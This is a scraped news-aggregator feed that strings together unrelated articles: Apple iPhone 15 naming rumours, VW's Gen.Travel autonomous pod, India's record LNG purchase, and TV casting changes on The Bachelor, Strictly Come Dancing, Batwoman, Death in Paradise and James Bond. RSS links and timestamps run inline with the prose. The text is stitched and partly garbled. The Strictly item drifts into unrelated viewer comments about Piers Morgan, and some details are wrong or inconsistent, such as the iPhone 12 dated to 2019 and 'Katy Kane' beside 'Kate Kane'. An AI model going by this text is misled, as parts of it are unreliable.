According to Bloombergreporter Mark Gurman, the company could call its largest and most expensive device in 2023 the iPhone 15 Ultra instead of the iPhone 15 Pro Max as you would expect given its recent track record. The shift would reportedly coincide with the most significant redesign of the iPhone since Apple released the iPhone 12 in 2019. Gurman expects the iPhone 15 to feature USB-C, among other “bigger changes.”

Apple’s smartphone line has seen a couple of branding tweaks over the years. In the early days of the iPhone, when the company released a substantial update every two years, iterative models carried an “S” designation. Since 2019 and the diversification of the line to include separate mainstream and premium variants, the company has employed “Pro” and “Pro Max” designations to market its most advanced phones. Moreover, earlier this year saw the return of the Plus branding, which Apple had not used since 2017. Dropping Pro Max in favor of Ultra would make a lot of sense since the Apple Watch line now includes an Ultra model.

The iPhone 15 rumor mill has already produced a few interesting predictions. Gurman previously reported that Apple was testing USB-C iPhones ahead of the European Union implementing a law requiring all new smartphones made after 2024 to feature the port. More recently, display analyst Ross Young said the entire iPhone 15 line would feature the iPhone 14 Pro’s Dynamic Island display cutout.

Looking to the more immediate future, Gurman also wrote today that Apple might not hold another event this fall. He says the company plans to announce new Mac mini, MacBook Pro and iPad Pro models before the end of the year. However, as those will be primarily iterative updates to existing devices, Gurman suggests Apple is “more likely” to share the existence of those products with the world through a series of press releases.

VW’s latest concept is a self-driving travel pod that can replace short flights https://briefnews.eu/vws-latest-concept-is-a-self-driving-travel-pod-that-can-replace-short-flights/ https://briefnews.eu/vws-latest-concept-is-a-self-driving-travel-pod-that-can-replace-short-flights/#respond Fri, 23 Sep 2022 17:08:11 +0000 https://briefnews.eu/vws-latest-concept-is-a-self-driving-travel-pod-that-can-replace-short-flights/ Many automakers dream of self-driving cars that are effectively lounges on wheels, but VW is taking things one step further. The brand has unveiled a Gen.Travel "design study" EV that it hopes could replace short flights. The four-person travel pod would be completely autonomous (that is, SAE Level 5) and revolve around a modular interior that can be customized for each trip. Businesspeople could work at a conference table during a ride, while red-eye travellers could use two seats that convert into beds.

The Gen.Travel could also be more comfortable than even some nicer airline seats. Dynamic lighting would not only help maintain natural sleep cycles, but reduce motion sickness. A configuration with front seats could keep children (and let's be honest, adults) entertained with augmented reality. While the bubble-like cabin is built to maximize your view of the outdoors, it promises both safety and isolation for sleeping passengers.

VW didn't outline performance. However, it said that a combination of AI and platooning (automated driving in convoys) could extend the range.

This is a research project meant to test driverless pods as "mobility-as-a-service" options. You probably won't ever sit in the Gen.Travel. It's a real prototype, though, and VW says features might find their way into production cars. We wouldn't count on all of them reaching the self-driving machines VW expects to make from 2025 onward, but don't be surprised if future robotaxis seem very familiar.

  • India is scrambling to replace canceled Russian gas deliveries, driving GAIL India to pay $ 40 per million BTUs for LNG.
  • That's the most expensive LNG cargo to ship to India in history, traders told Bloomberg.
  • It's also a sign India is struggling to fill the hole in Russian supplies after a Gazprom branch was seized by Germany.

India is scrambling to replace canceled Russian gas deliveries, causing one gas company to pay for the nation's most expensive liquefied natural gas cargo in history.

GAIL India, the largest gas distributor in the country, purchased three LNG cargoes last week for over $ 40 per million British thermal units, traders familiar with the matter told Bloomberg on Monday. Those are record prices for any LNG cargo to be delivered to India, more than doubling the prices paid last year.

It's also a sign the country is struggling to fill the hole in Russian supplies, as competition with energy-strapped Europe has driven natural gas prices to sky-high levels.

India has become one of Russia's largest fuel customers since the invasion of Ukraine, but some of those flows have been interrupted as the result of Germany seizing a local branch of Russia's Gazprom, using that plant to direct supplies to Europe instead ahead of winter.

The plant, which was renamed as Securing Energy for Europe, told GAIL that it no longer had supplies for India, and is currently paying a small fine for not delivering promised LNG shipments in October.

GAIL attempted negotiation with the plant last month, according to GAIL chairman Manoh Jain, but no new deal has been announced yet.

Jain claimed last month that failed deliveries from the plant only affected 10%-15% of India's gas supplies and were not significant, Reuters reported, although he noted that the company was concerned about securing gas supplies in the long-term.

The Bachelor: Emmanuel Acho to Replace Chris Harrison as Reunion Host https://briefnews.eu/the-bachelor-emmanuel-acho-to-replace-chris-harrison-as-reunion-host/ https://briefnews.eu/the-bachelor-emmanuel-acho-to-replace-chris-harrison-as-reunion-host/#respond Sun, 28 Feb 2021 03:41:56 +0000 https://briefnews.eu/the-bachelor-emmanuel-acho-to-replace-chris-harrison-as-reunion-host/

It will be Emmanuel Acho, and not Chris Harrison, who puts the Bachelor cast in the hot seat during the show’s After the Final Rose special.

Acho, a former NFL linebacker and Fox Sports analyst, will officially replace Harrison as host of the traditional finale special, in which leading man Matt James and his chosen winner will return to discuss the season and their current relationship status, reports our sister site Deadline. The two-hour Season 25 finale is set to air Monday, March 15 at 8/7c, with the Final Rose special airing immediately after.

“It’s both an honor and privilege to be hosting After the Final Rose,” Acho said in a statement. “This is an incredibly pivotal episode on one of the most storied shows in television history.”

Harrison will be absent from the special after choosing to take a “period of time” away from the franchise, following his controversial defense of current Bachelor contestant Rachael Kirkconnell. When photos surfaced of Kirkconnell attending an Antebellum party — a problematic gathering that celebrates the pre-Civil War South and reinforces racist imagery from that time — Harrison defended her in an Extra interview conducted by Rachel Lindsay, The Bachelorette‘s first-ever Black lead. Despite Lindsay’s attempts to explain why Kirkconnell’s actions were indefensible, Harrison decried “cancel culture” and suggested that Kirkconnell’s attendance at the party simply looks worse through a present-day lens.

The host later apologized for “wrongly speaking in a manner that perpetuates racism,” and three days later, he announced he would step aside from the franchise, including the upcoming Final Rose special. “The historic season of The Bachelor should not be marred or overshadowed by my mistakes or diminished by my actions,” Harrison wrote at the time. “I am dedicated to getting educated on a more profound and productive level than ever before.”

Beyond sitting out this finale special, Harrison’s future with the franchise has yet to be determined.

Anton du Beke ‘to replace’ Motsi Mabuse on Strictly Come Dancing after judge pulls out https://briefnews.eu/anton-du-beke-to-replace-motsi-mabuse-on-strictly-come-dancing-after-judge-pulls-out/ https://briefnews.eu/anton-du-beke-to-replace-motsi-mabuse-on-strictly-come-dancing-after-judge-pulls-out/#respond Fri, 13 Nov 2020 09:33:40 +0000 https://briefnews.eu/anton-du-beke-to-replace-motsi-mabuse-on-strictly-come-dancing-after-judge-pulls-out/

During Friday’s edition of Good Morning Britain, hosts Ben Shephard, 45, and Kate Garraway, 53, discussed the likelihood of Anton becoming a judge.

With Nicola Adams, 38, and Katya Jones, 31, also pulling out of the show after the latter tested positive for COVID-19, the journalists discussed bringing back Jacqui into the competition which could be a challenge as her professional partner is reported to be replacing Motsi.

As Kate explained this to her co-star, he said the judge who is self-isolating could still offer a critique from home.

“They’re not going to get Anton to sit at the desk because they would have got Anton to do it by now,” the Tipping Point star remarked.

Batwoman Taps Javicia Leslie to Replace Ruby Rose in Title Role https://briefnews.eu/batwoman-taps-javicia-leslie-to-replace-ruby-rose-in-title-role/ https://briefnews.eu/batwoman-taps-javicia-leslie-to-replace-ruby-rose-in-title-role/#respond Wed, 08 Jul 2020 23:07:08 +0000 https://briefnews.eu/batwoman-taps-javicia-leslie-to-replace-ruby-rose-in-title-role/ Call it divine intervention: God Friended Me actress Javicia Leslie will star as The CW’s new Batwoman following the shocking departure of Ruby Rose.

In a statement, Leslie — who will make her debut in the show’s Season 2 premiere, slated to air in January 2021 — said, “I am extremely proud to be the first Black actress to play the iconic role of Batwoman on television, and as a bisexual woman, I am honored to join this groundbreaking show, which has been such a trailblazer for the LGBTQ+ community.”

As previously reported, Leslie will play a new version of the titular superhero as opposed to taking over Rose’s Katy Kane. Her character, Ryan Wilder, “is about to become Batwoman,” reads the official description. “She’s likable, messy, a little goofy and untamed. She’s also nothing like Kate Kane, the woman who wore the Batsuit before her. With no one in her life to keep her on track, Ryan spent years as a drug-runner, dodging the GCPD and masking her pain with bad habits. Today Ryan lives in her van with her plant. A girl who would steal milk for an alley cat and could also kill you with her bare hands, Ryan is the most dangerous type of fighter: highly skilled and wildly undisciplined. An out lesbian. Athletic. Raw. Passionate. Fallible. And very much not your stereotypical All-American hero.”

In explaining the controversial decision to eschew a traditional recast and instead create “a whole new character” to slip into the cape and cowl for Season 2, showrunner Caroline Dries previously said, “To be honest with you, I did consider the ‘soap opera version’ [of recasting] for a hot minute, because selfishly we already had a couple episodes written, and transition-wise it would be seamless. But upon further reflection — and I think [Arrowverse EP] Greg [Berlanti] helped me make this call — he’s like, ‘I think we should just reboot Batwoman as a different character.’”

In addition to paying “respect to everything that Ruby [Rose] put into the Kate Kane character” during Season 1, Dries added, “it also helps the audience, because we’re not asking them to address ‘the elephant in the room’” by accepting a new face as the same person.

Rose’s Batwoman departure was announced in May. “I have made the very difficult decision to not return to Batwoman next season,” she said in a statement. “This was not a decision I made lightly as I have the utmost respect for the cast, crew and everyone involved with the show in both Vancouver and in Los Angeles.”

In a subsequent social media post, Rose addressed our report that she underestimated and thus eventually balked at the long hours required to star in a weekly TV series that shoots in Vancouver, leading to a mutual “breakup” with the show. “Don’t believe everything you read by anon sources online,” she wrote. “I lived in Vancouver for a year working on the mountains when I was 18 because I love that city! I’ve also worked in other places in Canada… perfect beautiful country.”

Warner Bros. and The CW previously confirmed that, much like Rose’s Katy Kane, the new character would be an out lesbian played by another LGBTQ actress. “The studio and network are firmly committed to Batwoman’s second season and long-term future,” the said in a statement, “and we — along with the show’s talented creative team — look forward to sharing its new direction, including the casting of a new lead actress and member of the LGBTQ community, in the coming months.”

In addition to being a series regular on CBS’ recently cancelled (and also Berlanti-produced) God Friended Me, German-born Leslie’s other TV credits include the BET drama Family Business and CBS’ MacGyver.

Strictly’s Bruno Tonioli backs Cheryl Cole to ‘replace’ him if forced to miss 2020 series https://briefnews.eu/strictlys-bruno-tonioli-backs-cheryl-cole-to-replace-him-if-forced-to-miss-2020-series/ https://briefnews.eu/strictlys-bruno-tonioli-backs-cheryl-cole-to-replace-him-if-forced-to-miss-2020-series/#respond Fri, 26 Jun 2020 05:42:02 +0000 https://briefnews.eu/strictlys-bruno-tonioli-backs-cheryl-cole-to-replace-him-if-forced-to-miss-2020-series/

Bookmaker Coral speculated that the former Girls Aloud bandmate would take the reins after her popularity on BBC’s The Greatest Dancer talent show.

They slashed the odds in half, with Coral’s John Hill saying: “With doubts over Bruno Tonioli’s availability this year, we have slashed the odds on Cheryl being a judge on Strictly in 2020.

“Cheryl has been linked with being a contestant on Strictly for a while and they may just get their target this year, but in the judges’ chair, rather than the dance floor.”

Cheryl currently has odds of 2/1 in the bookies’ eyes, but would she want to take it on?

“I need a stiff debate at 7am to wake up. Yoo much softness. If I’m allowed to say that these days. PLEASE EDIT YOUR SCHEDULE!!”

The Good Morning Britain fan wasn’t alone in their thinking as other viewers called for Piers to return.

Replying to a photo of Susanna, Kate and Ben from GMB’s Twitter account, one fan said: “Where’s Piers? No point watching now.”

Death in Paradise: Who will replace Ardal O’Hanlon? BBC’s HUGE hint in first glimpse photo https://briefnews.eu/death-in-paradise-who-will-replace-ardal-ohanlon-bbcs-huge-hint-in-first-glimpse-photo/ https://briefnews.eu/death-in-paradise-who-will-replace-ardal-ohanlon-bbcs-huge-hint-in-first-glimpse-photo/#respond Fri, 18 Oct 2019 13:10:12 +0000 http://briefnews.eu/death-in-paradise-who-will-replace-ardal-ohanlon-bbcs-huge-hint-in-first-glimpse-photo/

Death in Paradise has been a massively popular series since it first began in 2011. Now season nine is nearly in reach as viewers return to the Island of Saint Marie once more – but this time will be DI Mooney’s (played by Ardal O’Hanlon) last outing. Ahead of its return, the BBC has teased who could be replacing him with a first glimpse at the new character.

Who will replace Ardal O’Hanlon?

Since the BBC revealed Ardal O’Hanlon was leaving Death in Paradise in season nine, fans have been wondering just who could replace him.

There has been some talk Kris Marshall could return again, as well as Danny John-Jules.

However, now the BBC has released a first look at the new character in a brand new image.

While his face and name are not revealed in the teaser, there are some clues to who he could be.

The first reveal is the new DI will be another man so it seems the series will be following the same pattern as previous replacements, which has seen a number of great British actors take on the role of the police inspector.

The only other hints about the new character can be seen from his backpack, which shows he’s got suncream packed away – could this mean another fish out of water on the Caribbean island?

Fans will remember that in the past, nearly all of the incoming DIs have struggled to deal with the heat of the island.

Along with the release of the image, the BBC also revealed viewers will not have to wait until the series airs in order to find out who the new DI is.

In fact, it will be revealed ahead of time – but no information has been revealed about when viewers will found out yet.

Although while the new actor may be revealed soon, the ins and outs of how Mooney is set to leave the island will only be revealed when the season returns.

The news O’Hanlon was leaving was announced earlier this month when he revealed he was going on to pursue new acting challenges.

In a statement, he said: “I’ve spent the last four summers in Guadeloupe playing DI Jack Mooney (solving over 20 murder cases in my time there!).”

He added: “It’s been a hugely rewarding and unforgettable experience, working with incredibly talented actors, directors and crew while discovering a magical part of the world.

“However, it’s time to move on and explore other opportunities – preferably nearer the Arctic Circle.

“I’m confident that Death in Paradise will go from strength to strength and viewers will share my enthusiasm for Jack’s successor.”

In the statement it was also revealed O’Hanlon will be leaving the show mid-way through the ninth series.

The latest outing will return to the island of Saint Marie as the police officers investigate a new spate of bizarre crimes.

Ahead of its return, the BBC has also revealed a little bit about what could happen in the new season.

This includes actor Aude Legastelois being promoted to a full-time cast member of the series with her character DS Madeleine Dumas.

The synopsis said: “Series nine will see the Honoré Police team get to know their new DS, Madeleine, while a surprise kiss catches Jack off guard…”

Joining Dumas in returning once again will be Tobi Bakare as Officer JP Hooper, Shyko Amos as Officer Ruby Patterson and Don Warrington as Commissioner Selwyn Patterson.

Death in Paradise season 9 returns to the BBC in January 2020.

James Bond: THIS actor just joined the running to replace Daniel Craig https://briefnews.eu/james-bond-this-actor-just-joined-the-running-to-replace-daniel-craig/ https://briefnews.eu/james-bond-this-actor-just-joined-the-running-to-replace-daniel-craig/#respond Tue, 12 Feb 2019 09:35:30 +0000 http://briefnews.eu/james-bond-this-actor-just-joined-the-running-to-replace-daniel-craig/

Realistically we’re still a long way away from Craig’s successor being revealed. His last movie as James Bond doesn’t go into production until this spring, and it’ll be released in 2020. It won’t be until long after the dust has settled that boss Barbara Broccoli starts thinking about his replacement – but that hasn’t stopped fans and punters from analysing the frontrunners.

An actor who has quietly been building support is Dev Patel.

The 28-year-old Brit, who came to fame playing Anwar Kharral in the first two seasons of Skins, has enjoyed international superstardom in the likes of Slumdog Millionaire and Lion.

For the latter, he received an Oscar nomination for Best Supporting Actor, and won the equivalent BAFTA.

Now, bookmakers Coral have told Express.co.uk that they have installed Patel into the betting at 33/1 – hardly a frontrunner, but certainly part of the conversation.

Tweets calling for his hiring have been continuous over recent years as his profile has continued to grow.

“Dev Patel as the new James Bond. You know I’m right,” reads one post.

“Why not cast Dev Patel as James Bond? Like, yesterday,” said someone else.

A post on the James Bond board on Reddit just days ago has also put focus on the star.

“For a start, he’s British-born, he looks great in a suit and he has that well-known-but-not-yet-a-household-name set of filmography, making him an ideal casting choice for 007. Oh, and his acting chops are A+,” wrote user Qoslca.

What’s more, a recent piece from Esquire about his latest hairstyle had them dubbing him “pure James Bond material”, and a quick Google search reveals several articles putting him forward.

So do frontrunners like Richard Madden, Tom Hiddleston and Idris Elba need to watch their back?

James Bond 25 is out on February 14, 2020.
